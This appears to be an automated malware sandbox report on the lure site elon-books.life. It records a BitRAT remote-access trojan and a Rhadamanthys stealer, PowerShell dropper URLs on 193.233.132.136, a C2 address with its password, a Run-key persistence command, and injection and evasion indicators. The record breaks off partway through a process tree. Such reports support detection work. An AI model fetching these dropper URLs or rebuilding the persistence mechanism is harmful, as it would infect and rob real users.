bitrat | hxxp://elon-books[.]life

Analysis

max time kernel
149s
max time network
148s
platform
windows10-1703_x64
resource
win10-20240214-it
resource tags

arch:x64arch:x86image:win10-20240214-itlocale:it-itos:windows10-1703-x64systemwindows
submitted
20-03-2024 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://elon-books.life

Score

10^/10

bitrat rhadamanthys persistence stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.233.132.136/a/z.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.233.132.136/a/s.png

Extracted

Family

bitrat

Version

1.38

193.233.132.136:4404

Attributes

communication_password
93d93f0d629d26b535ee4c950717ab2b
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

RegSvcs.exe

description pid process target process

PID 2996 created 2812 2996 RegSvcs.exe sihost.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

40 2384 powershell.exe
41 4792 powershell.exe

description	pid	process	target process
PID 2996 created 2812	2996	RegSvcs.exe	sihost.exe

flow	pid	process
40	2384	powershell.exe
41	4792	powershell.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/4812-385-0x0000000000400000-0x00000000007D2000-memory.dmp	upx
behavioral1/memory/4812-388-0x0000000000400000-0x00000000007D2000-memory.dmp	upx
behavioral1/memory/4812-387-0x0000000000400000-0x00000000007D2000-memory.dmp	upx
behavioral1/memory/4812-395-0x0000000000400000-0x00000000007D2000-memory.dmp	upx
behavioral1/memory/4812-396-0x0000000000400000-0x00000000007D2000-memory.dmp	upx
behavioral1/memory/4812-398-0x0000000000400000-0x00000000007D2000-memory.dmp	upx
behavioral1/memory/4812-399-0x0000000000400000-0x00000000007D2000-memory.dmp	upx
behavioral1/memory/4812-400-0x0000000000400000-0x00000000007D2000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3356371483-1660115160-1611493187-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "wscript //E:VBScript C:\\Users\\Public\\0x.log //Nologo"	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

RegSvcs.exe

pid process

4812 RegSvcs.exe

pid	process
4812	RegSvcs.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 4792 set thread context of 2996	4792	powershell.exe	RegSvcs.exe
PID 2384 set thread context of 4812	2384	powershell.exe	RegSvcs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2432 2996 WerFault.exe RegSvcs.exe
4456 2996 WerFault.exe RegSvcs.exe

pid	pid_target	process	target process
2432	2996	WerFault.exe	RegSvcs.exe
4456	2996	WerFault.exe	RegSvcs.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3356371483-1660115160-1611493187-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133554228084775364"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3356371483-1660115160-1611493187-1000_Classes\Local Settings chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3356371483-1660115160-1611493187-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

chrome.exeAcroRd32.exechrome.exepowershell.exepowershell.exeRegSvcs.exedialer.exe

pid	process
480	chrome.exe
480	chrome.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
1828	chrome.exe
1828	chrome.exe
2384	powershell.exe
2384	powershell.exe
4792	powershell.exe
4792	powershell.exe
2384	powershell.exe
4792	powershell.exe
2384	powershell.exe
4792	powershell.exe
2996	RegSvcs.exe
2996	RegSvcs.exe
1732	dialer.exe
1732	dialer.exe
1732	dialer.exe
1732	dialer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

480 chrome.exe
480 chrome.exe
480 chrome.exe
480 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe
Token: SeShutdownPrivilege	480	chrome.exe
Token: SeCreatePagefilePrivilege	480	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

chrome.exeAcroRd32.exe

pid	process
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
2272	AcroRd32.exe
2272	AcroRd32.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe
480	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

AcroRd32.exe

pid process

2272 AcroRd32.exe
2272 AcroRd32.exe
2272 AcroRd32.exe
2272 AcroRd32.exe

pid	process
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe
2272	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 480 wrote to memory of 5076	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 5076	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 4692	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 2100	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 2100	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe
PID 480 wrote to memory of 3276	480	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4312 attrib.exe

pid	process
4312	attrib.exe

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2812
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://elon-books.life
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff9b6a39758,0x7ff9b6a39768,0x7ff9b6a39778
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:2
  2⤵
  PID:4692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:8
  2⤵
  PID:2100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2040 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:8
  2⤵
  PID:3276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2668 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:1
  2⤵
  PID:4772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2676 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:1
  2⤵
  PID:3492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4468 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:8
  2⤵
  PID:4356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:8
  2⤵
  PID:2300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5104 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:1
  2⤵
  PID:3680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3064 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:1
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:8
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:8
  2⤵
  PID:724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4888 --field-trial-handle=1736,i,2792774142684299274,15169631175514048862,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1828

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:500

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4252

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Elon_Musk_-_Bitcoin_King.zip\Elon Musk - Bitcoin King.pdf"
1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2272
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
  2⤵
  PID:4584
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=85207A996C3E60F2A04595A978CF400A --mojo-platform-channel-handle=1604 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:3304
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=5C6E20BBC9D021F6588DD96697C3B1EF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=5C6E20BBC9D021F6588DD96697C3B1EF --renderer-client-id=2 --mojo-platform-channel-handle=1636 --allow-no-sandbox-job /prefetch:1
    3⤵
    PID:4148
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=013E409A400C8485C73DCE4BA22FD95E --mojo-platform-channel-handle=2288 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:4420
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7BAE0F97F92E6F8B2ADCD0200C6E260E --mojo-platform-channel-handle=1712 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:5036
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
